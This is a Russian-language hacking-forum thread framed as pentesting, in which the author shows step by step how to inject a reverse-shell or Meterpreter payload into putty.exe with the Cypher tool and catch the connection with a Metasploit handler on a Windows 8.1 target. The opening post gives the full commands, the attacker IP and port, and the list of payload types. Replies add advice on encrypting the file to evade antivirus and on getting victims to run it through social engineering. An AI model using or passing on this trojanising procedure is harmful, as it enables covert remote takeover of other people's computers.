HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.12.2016, 00:03
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.



В качестве атакующей системы будет использоваться OS Kali Linux,



в качестве целевой системы Windows 8.1 с актуальными обновлениями.



Итак, вернемся к Cypher, скачиваем ее с Github:

> git clonehttps://github.com/xan7r/cypher



Выполняем следующие команды:

> cd cypher

> chmod a+x addShell.py

> ls –a

Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.



Теперь выполним следующую команду:

> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0




В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.


· 0 – windows/shell_reverse_tcp

· 1 – windows/meterpreter/reverse_http

· 2 – windows/meterpreter/reverse_http +PrependMigrate

· 3 – windows/meterpreter/reverse_https

· 4 – windows/meterpreter/reverse_https +PrependMigrate

По итогу получаем файл putty_evil.exe в папке с Cypher.



Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit



Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.



Сменим кодировку командой:

> chcp 65001




Посмотрим подробную информацию о системе:


> systeminfo




Это все. Спасибо за внимание.
 
Ответить с цитированием

  #2  
Старый 11.12.2016, 00:56
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

m0tion сказал(а):

Антивирусами палится?

8.1. - Без алертов запустился
 
Ответить с цитированием

  #3  
Старый 11.12.2016, 20:32
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

mafiasepa сказал(а):

set LHOST 192.168.0.107(это свой ip или тест машины)?

Свой адрес
 
Ответить с цитированием

  #4  
Старый 17.12.2016, 00:05
msfconsole
Новичок
Регистрация: 23.11.2016
Сообщений: 0
С нами: 4983840

Репутация: 0
По умолчанию

Цитата:

Inject0r сказал(а):

Касперский палит.

Как вариант можно закриптовать )
 
Ответить с цитированием

  #5  
Старый 09.01.2017, 13:02
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Win XP Sp3 =)



После активации секунды две и ошибка, за эти секунды успевает только начать коннект (как видно на скрине внизу) =)
 
Ответить с цитированием

  #6  
Старый 15.02.2017, 11:16
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

Darwin_Douglas сказал(а):

Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.

Да, все верно
 
Ответить с цитированием

  #7  
Старый 15.02.2017, 12:22
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

Darwin_Douglas сказал(а):

Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.

Если внимательно почитать форум и темы про социальную инженерию, сложностью это не станет. Запуск прриложения дело времени - если файло было скачано, то явно будет и запущено.
 
Ответить с цитированием

  #8  
Старый 20.05.2017, 01:00
Runinterface
Новичок
Регистрация: 24.10.2016
Сообщений: 0
С нами: 5027217

Репутация: 0
По умолчанию

[*] Sending stage (957487 bytes) to 192.168.1.153
c 10ки пробую.
Вот такое сообщение прилетает и все более ничего не происходит в чем может быть трабл?
 
Ответить с цитированием

  #9  
Старый 04.11.2017, 21:53
BarDimNik
Новичок
Регистрация: 28.02.2017
Сообщений: 0
С нами: 4844417

Репутация: 0
По умолчанию

Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?
 
Ответить с цитированием

  #10  
Старый 07.11.2017, 16:20
woolf1514
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами: 4835747

Репутация: 0
По умолчанию

Так это джойнер получается. Как у него в целом с палевностью? Есть возможность проверить твой готовый файл, к примеру, на этом сканере?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.